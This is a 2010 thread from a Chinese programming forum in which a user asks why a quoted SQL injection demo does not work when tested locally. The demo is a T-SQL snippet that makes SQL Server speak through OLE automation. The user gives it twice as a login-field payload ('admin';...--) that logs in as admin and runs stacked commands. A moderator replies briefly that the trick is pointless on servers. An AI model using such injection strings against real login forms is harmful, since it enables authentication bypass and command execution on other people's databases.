| 网站首页 | 业界新闻 | 小组 | 威客 | 人才 | 下载频道 | 博客 | 代码贴 | 在线编程 | 编程论坛
欢迎加入我们,一同切磋技术
用户名:   
 
密 码:  
共有 607 人关注过本帖
标题:让SQL会说话
只看楼主 加入收藏
wifayy
Rank: 1
等 级:新手上路
帖 子:16
专家分:0
注 册:2010-7-23
结帖率:50%
收藏
已结贴  问题点数:10 回复次数:2 
让SQL会说话
declare @o int,@ret int
exec sp_oacreate ’speech.voicetext’,@o out
exec sp_oamethod @o,’register’,NULL,’foo’,’bar’
exec sp_oasetproperty @o,’speed’,150
exec sp_oamethod @o,’speak’,NULL,’all your sequel servers are belong to,us’,528
waitfor delay ’00:00:05’
我们可以在我们假定的例子中,通过指定在用户名后面来执行它(注意这个例子不仅仅是注入一个脚本,同时以admin权限登陆到应用程序):
Username:admin’;declare @o int,@ret int exec sp_oacreate ’speech.voicetext’,@o out exec sp_oamethod @o,’register’,NULL,’foo’,’bar’ exec sp_oasetproperty @o,’speed’,150 exec sp_oamethod @o,’speak’,NULL,’all your sequel servers are belong to us’,528 waitfor delay ’00:00:05’--

 
看到这个很有意思 想自己测试下 发现一个问题 SQL是SYSTEM权限启动 他因该是SYSTEM发声的 我们是ADMIN登陆的 那么就是听不到了?


Username:admin’;declare @o int,@ret int exec sp_oacreate ’speech.voicetext’,@o out exec sp_oamethod @o,’register’,NULL,’foo’,’bar’ exec sp_oasetproperty @o,’speed’,150 exec sp_oamethod @o,’speak’,NULL,’all your sequel servers are belong to us’,528 waitfor delay ’00:00:05’--

上面这个USERNAME:ADMIN 难道是让下面的语句以ADMIN权限启动?  可是我执行不成功 不知道是哪里错了 斑竹给指点下吧
搜索更多相关主题的帖子: SQL 说话 
2010-11-15 15:30
cnfarer
Rank: 16Rank: 16Rank: 16Rank: 16
等 级:版主
威 望:179
帖 子:3330
专家分:21157
注 册:2010-1-19
收藏
得分:10 
对于服务器来说,这是画蛇添足!

★★★★★为人民服务★★★★★
2010-11-18 07:07
wifayy
Rank: 1
等 级:新手上路
帖 子:16
专家分:0
注 册:2010-7-23
收藏
得分:0 
本机测试的 服务器是听不到啊. 麻烦斑竹帮看下吧
2010-11-18 13:33
快速回复:让SQL会说话
数据加载中...
 
   



关于我们 | 广告合作 | 编程中国 | 清除Cookies | TOP | 手机版

编程中国 版权所有,并保留所有权利。
Powered by Discuz, Processed in 0.023575 second(s), 9 queries.
Copyright©2004-2024, BCCN.NET, All Rights Reserved